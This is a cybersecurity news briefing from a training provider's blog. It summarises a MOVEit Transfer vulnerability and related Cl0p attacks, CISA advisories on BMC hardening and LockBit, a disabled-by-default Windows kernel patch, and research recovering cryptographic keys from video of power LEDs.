CBS Chicago Team, Central Illinois hospital closing after 2021 ransomware attack, news report, 13 June 2023. Available online at https://www.cbsnews.com/chicago/news/st-maragrets-health-central-illinois-hospital-closing/.
MOVEit Transfer: The Gift That Just Keeps Giving
File transfer software vendor Progress Software has had to disclose yet another critical vulnerability in their MOVEit Transfer product. At the time of writing, no fix is available, and the suggested mitigation is to block all HTTP and HTTPS traffic to MOVEit Transfer machines. The firm notes that once this is done:
- Users will not be able to log on to the MOVEit Transfer web UI
- MOVEit Automation tasks that use the native MOVEit Transfer host will not work
- REST, Java and .NET APIs will not work
- MOVEit Transfer add-in for Outlook will not work
But other than that, it will be business as usual, with the SFTP and FTP protocols still working as normal - which renders using MOVEit somewhat pointless, since its major convenience is a browser-based interface that is easy for users.
Meanwhile, CNN News reports that a number of US Government agencies have been hit by ransomware group Cl0p, including the Department of Energy, as well as one of its subcontractors.
Progress Software, MOVEit Transfer Critical Vulnerability – CVE Pending (June 15, 2023), web article, 15 June 2023. Available online at https://community.progress.com/s/article/MOVEit-Transfer-Critical-Vulnerability-15June2023.
Lyngaas, Sean, Exclusive: US government agencies hit in global cyberattack, news report, 15 June 2023. Available online at https://edition.cnn.com/2023/06/15/politics/us-government-hit-cybeattack/index.html.
These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.
Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License and is labeled TLP:CLEAR.
Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.
News Stories
CISA Releases Two Advisories
The US Cybersecurity & Infrastructure Security Agency has released two advisories which should prove useful to enterprises everywhere.
The first, issued in conjunction with the NSA, addresses the recent vulnerabilities in baseboard management controllers (BMC's) discovered by Eclypsium. BMC's are buried deep within system boards and get access to the system even before the UEFI BIOS starts execution, allowing a threat actor to install bootkits, or disable the TPM and UEFI secure boot process. In fact, the BMC remains active even when a server is powered down.
The CISA/NSA hardening guide lists a number of recommended actions, including updating BMC credentials, using VLAN segmentation to isolate BMC's from the other network infrastructure, performing routine update checks and other suggestions.
The other CISA advisory is one of a series on understanding ransomware threat actors, and deals specifically with the LockBit Ransomware-as-a-Service group. LockBit affiliates are probably the most active of all ransomware groups, and the advisory provides advice on the vulnerabilities they typically exploit, as well as the TTP's they use. It also provides a number of suggested mitigations.
Uncredited, CISA and NSA Release Joint Guidance on Hardening Baseboard Management Controllers (BMCs), cybersecurity advisory alert, 14 June 2023. Available online at https://www.cisa.gov/news-events/alerts/2023/06/14/cisa-and-nsa-release-joint-guidance-hardening-baseboard-management-controllers-bmcs.
Uncredited, CISA and Partners Release Joint Advisory on Understanding Ransomware Threat Actors: LockBit, cybersecurity advisory alert, 14 June 2023. Available online at https://www.cisa.gov/news-events/alerts/2023/06/14/cisa-and-partners-release-joint-advisory-understanding-ransomware-threat-actors-lockbit.
Microsoft Patches Windows Kernel Vuln, Doesn't Enable Patch
A curious situation has arisen with yesterday's updates for Windows Server 2022, Windows 10 and Windows 11: the Redmondites shipped a patch for an important kernel information disclosure vulnerability, but did not enable the fix. The vulnerability, which could allow an authenticated but unprovileged attacker to view the contents of the heap of a privileged process, was awarded a base CVSS 3.1 score of 4.7 - it would have been higher if the attack was not so complex, requiring coordination with another, privileged process.
At a guess the likely delay in enabling the fix is due to the time required to perform comprehensive regression testing; after all, everything makes use of the heap and the kernel, so there could be corner cases with applications doing strange things that a fix would break. However, users who have relatively simple installations, especially in high-threat environments, e.g. facing the Internet, may want to enable the fix, and Microsoft has released a knowledge base article providing instructions.
Enabling the patch simply involves add a registry entry, with different values for the various different affected platforms. You might want to test the effects in a lab environment before deploying this too widely, though.
Uncredited, KB5028407: How to manage the vulnerability associated with CVE-2023-32019, Windows Support knowledge base article, 13 June 2023. Available online at https://support.microsoft.com/en-gb/topic/kb5028407-how-to-manage-the-vulnerability-associated-with-cve-2023-32019-bd6ed35f-48b1-41f6-bd19-d2d97270f080.
Yet Another Sidechannel Attack - This Time Using Power LED's
In a paper to be presented at Black Hat 23, researchers from Cornell and Ben Gurion universities demonstrate a novel technique to recover cryptographic keys from a device by analyzing video footage of the device's power LED. This works because the cryptographic computations performed by the CPU change the device's power consumption, which in turn affects the brightness of the power LED.
The attack uses an ingenious technique to increase the camera's sampling rate from the normal rate of 60 frames per second, which would be too slow, to 60 thousand measurements per second by exploiting the camera's rolling shutter.
In their first demonstrations, the researchers were able to recover a 256-bit ECDSA key from a smart card by analyzing video footage of the power LED of a smart card reader via a hijacked Internet-connected security camera located 16 meters away from the smart card reader.
The device need not even have a power LED itself, but merely be connected to something that does; in their second attack the researchers were able to recover a 378-bit SIKE key from a Samsung Galaxy S8 by analyzing video footage of the power LED of Logitech Z120 USB speakers that were connected to the same USB hub used to charge the phone. In this case, the camera was an iPhone 13 Pro Max.
I shall be interested to see whether this technique will work against the LED's of a beefy tower computer when a security key is being used as part of multi-factor authentication. If it does, I shall be disabling the LED's and adding a roll of thick black electrical tape to my travel kit.
Nassi, Ben, et. al., Video-Based Cryptanalysis: Extracting Cryptographic Keys from Video Footage of a Device’s Power LED, conference presentation, August 2023. Available online at https://www.nassiben.com/video-based-crypta.
These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.
Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License and is labeled TLP:CLEAR.